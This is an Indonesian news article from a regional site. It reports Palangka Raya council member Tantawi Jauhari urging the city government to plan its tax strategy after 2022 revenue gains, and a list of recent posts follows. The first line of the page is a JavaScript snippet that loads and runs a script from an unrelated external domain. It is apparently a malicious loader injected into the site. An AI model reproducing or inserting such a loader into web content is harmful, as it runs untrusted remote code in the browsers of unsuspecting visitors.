(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD Kota Palangka Raya

Anggota DPRD Kota Palangka Raya Dorong Pemkot Siapkan Strategi Pajak yang Cermat


KANALKALIMANTAN.COM,PALANGKARAYA- Anggota Dewan Perwakilan Rakyat Daerah (DPRD) Kota Palangka Raya, Kalimantan Tengah, Tantawi Jauhari, meminta pemerintah kota setempat mengembangkan strategi yang efektif dalam menggali potensi pajak sebagai tambahan pendapatan bagi kota ini, mengingat pencapaian pada tahun 2022 yang memperlihatkan kenaikan target pajak.

Menurut Tantawi, data yang dikeluarkan oleh Badan Pengelola Pajak dan Retribusi Daerah (BPPRD) Kota Palangka Raya pada tahun 2022 menunjukkan bahwa ada tiga sektor pajak yang mengalami peningkatan pendapatan yang signifikan. Sebagian besar pendapatan pajak berasal dari sektor hiburan, restoran, dan pajak hotel.

“Dalam beberapa kasus, kenaikan pendapatan pada sektor-sektor pajak tersebut disebabkan oleh pelaksanaan agenda nasional dan internasional yang diadakan di Kota Palangka Raya, seperti Union Cycliste Internationale Mountain Bike (UCI-MTB), Festival Budaya Isen Mulang, dan Raker Komwil Apeksi,” ungkapnya.

Dengan adanya peningkatan pendapatan yang signifikan dari sektor-sektor tersebut, Tantawi meminta BPPRD Kota Palangka Raya untuk kembali mengevaluasi dan memetakan potensi-potensi pajak lainnya yang dapat dihasilkan dari usaha-usaha di wilayah tersebut.

“Kami sangat mengapresiasi pencapaian di tiga sektor pajak tersebut, tetapi kami juga ingin mengingatkan bahwa pencapaian tersebut harus dipertahankan dengan baik, dan kita tidak boleh mengalami penurunan realisasi pajak pada tahun ini,” tegasnya.

Selanjutnya, politisi dari Partai Gerakan Indonesia Raya (Gerindra) ini menekankan perlunya instansi terkait, mulai dari bulan Januari ini, bersama tim terpadu, untuk merancang rencana awal dalam menyusun strategi untuk menggali potensi pajak di daerah setempat.

Tantawi juga meminta agar instansi teknis menjadi visioner dan mempertimbangkan potensi pajak yang dapat diperoleh dan dimaksimalkan pada tahun ini. Ia mengingatkan agar tidak terlalu terpaku pada pencapaian tahun sebelumnya sehingga melupakan strategi yang harus digunakan tahun ini.

“Kami, sebagai wakil rakyat di DPRD Palangka Raya yang berfokus pada pemerintahan dan keuangan, selalu siap mendukung dan mendorong upaya dinas, termasuk memberikan regulasi yang diperlukan untuk mempermudah pelaksanaan tugas,” tambahnya.

Tantawi Jauhari menambahkan bahwa dengan peningkatan pendapatan pajak daerah, akan ada dampak positif pada pembangunan, termasuk dalam hal infrastruktur, pengembangan Sumber Daya Manusia (SDM), dan sektor lainnya di Kota Palangka Raya. (www.kanalkalimantan.com/hms).


Muhammad Andi

Recent Posts

Dana Hibah Pengamanan Pilkada 2024 di Banjarmasin Capai Rp8 Miliar

KANALKALIMANTAN.COM, BANJARMASIN - Tahapan Pemilihan Kepala Daerah (Pilkada) Serentak 2024 sudah berjalan, salah satu komponen… Read More

13 jam ago

Bakesbangpol Banjarbaru Serahkan Dana Hibah Pengamanan Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru menempatkan dana hibah daerah senilai Rp3 miliar untuk… Read More

13 jam ago

Pemkab HSU Beri Penghargaan Warga yang Hibahkan Tanah untuk Fasilitas Pendidikan

KANALKALIMANTAN.COM, AMUNTAI - Sebanyak 134 warga menerima penghargaan dari Pemerintah Kabupaten (Pemkab) Hulu Sungai Utara… Read More

14 jam ago

“Jum’at Berbagi” Polres HSU Sediakan Makanan dan Minuman Gratis

KANALKALIMANTAN.COM, AMUNTAI – “Jum’at Berbagi” menjadi salah satu program yang dijalankan Satuan Pembinaan Masyarakat (Sat… Read More

14 jam ago

Merger TPS di Pilkada 2024, KPU Banjarbaru: Dipastikan Jumlah TPS Berkurang

KANALKALIMANTAN.COM, BANJARBARU - Pelaksanaan Pemilihan Kepala Daerah (Pilkada) 2024 di Kota Banjarbaru sedikit berbeda daripada… Read More

15 jam ago

Resmi! PPP Keluarkan Rekomendasi Aditya Maju Pilwali Banjarbaru

Koalisi PPP-PKB Cukup untuk Pencalonan Aditya, Pasangan Pendamping Belum Ada Read More

18 jam ago

This website uses cookies.